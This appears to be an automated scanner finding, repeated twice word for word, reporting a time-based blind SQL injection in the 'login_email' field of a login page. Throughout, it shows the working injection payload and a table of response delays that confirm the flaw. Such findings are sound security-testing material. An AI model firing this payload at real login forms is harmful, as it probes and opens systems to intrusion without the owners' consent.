URL:
http://site.com/login.php
Parameter:
login_email
Attack Details
URL encoded POST input login_email was set to 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
Tests performed:
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 16.848
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.414
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 15.445
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.396
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.402
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.24
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.399
http://site.com/login.php
Parameter:
login_email
Attack Details
URL encoded POST input login_email was set to 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
Tests performed:
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 16.848
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.414
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 15.445
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.396
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.402
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.24
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.399